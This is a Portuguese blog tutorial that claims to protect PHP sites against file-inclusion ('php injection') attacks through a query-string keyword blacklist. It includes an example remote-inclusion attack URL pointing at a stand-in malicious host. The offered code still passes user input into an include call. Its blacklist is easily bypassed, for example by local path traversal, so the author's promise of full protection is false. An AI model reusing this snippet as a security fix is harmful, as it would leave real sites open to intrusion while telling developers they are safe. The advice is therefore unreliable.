Bloquear php injection

Aprenda a protejer suas query strings para bloquear ataques crackers com o uso de php injection

Por Programação Pular para comentários
Bloquear php injection
Bem pessoal nessa minah primeira coluna vou ensinar como se protejer de php injection, muitos amigos sempre me perguntam como fazer isso, vamos lá !


//Pega os dados passados pela URL
$pagina=$_GET['pagina'];

    //Verifica se a string passada possui algum trecho invalido
    //Caso tenha mostra uma mensagem de erro
    if(eregi("http|www|ftp|.dat|.txt|.gif|wget", $pagina))
    {
        echo "Ops! Problemas na página!";
    //Se a variavel passada estiver dentro das normas, executa o else abaixo:
    }else{
        if(!empty($pagina)) {
            @include ("$pagina.php");
        }else{
            @include ("capa.php"); //essa seria a sua página principal
        }
    }
?>


Vamos entender o código !

Ele não deixa que ninguém tente colocar urls e outros tipos de códigos em sua query string !

Por exemplo, seu site funciona da seguinte maneira:

index.php?pagina=contato
assim funciona beleza

E se o cidadão tentar fazer isso:
index.php?pagina=http://www.sitedovirus.com&cmd=comando malicioso
aí o script bloqueia !


Faça isso e fique livre de ataques crackers em seu site !


Até a próxima !

Compartilhe com seus amigos:
Igor Diniz
Igor Diniz Desenvolvedor web, design, programação, marketing, dentre outros ;)
Quer conversar com o(a) Igor, comente:
Carregar comentários
Últimas notícias de Programação
  • Google usa Mulher-Maravilha para ajudar meninas a programar

    Google usa Mulher-Maravilha para ajudar meninas a programar

    Meninas ganham um incentivo extra na hora de aprender a programar, a Mulher-Maravilha.

  • Criando um cadastro de usuário em Java

    Criando um cadastro de usuário em Java

    O objetivo deste artigo é desenvolver uma aplicação em JSE (Java Standard Edition) de inserção de dados utilizando alguns padrões de projeto.

  • Quer aprender PHP? Saiba mais

    Quer aprender PHP? Saiba mais

    Chegou o tão aguardado curso online de PHP do Oficina da Net. Você não pode perder. PHP é uma das linguagens mais usadas no mundo. Os conteúdos que vou mostrar no curso, são exatamente o que você precisa saber para iniciar sua carreira como programador.

  • Formulário de contato em php

    Formulário de contato em php

    Guia do PHP: Aprenda a fazer um formulário em PHP que envia via SMTP autenticado o e-mail para um destinatário.

  • Como fazer um GIF?

    Como fazer um GIF?

    Aprenda a criar um GIF animado de vídeos. Descubra como criar os GIFs, imagens animadas que você vê em na internet.

  • O que priorizar na hora de escolher o hosting para seu site?

    O que priorizar na hora de escolher o hosting para seu site?

    Com o crescimento das ofertas na web, saiba o que você deve levar em consideração na hora de escolher a melhor empresa de hosting para seu empreendimento

  • O que preciso fazer para criar um aplicativo?

    O que preciso fazer para criar um aplicativo?

    Temos visto que desenvolver aplicativos que visam o mercado mobile pode ser mais que uma alternativa rentável, pode colocá-lo no topo, deixá-lo rico. Mas nem tudo são flores, e o aspirante a desenvolvedor de app precisa seguir algumas regras.

  • WEBINAR 3.9

    WEBINAR 3.9

    Venha para o Maker e descubra como tornar o seu negócio mais competitivo.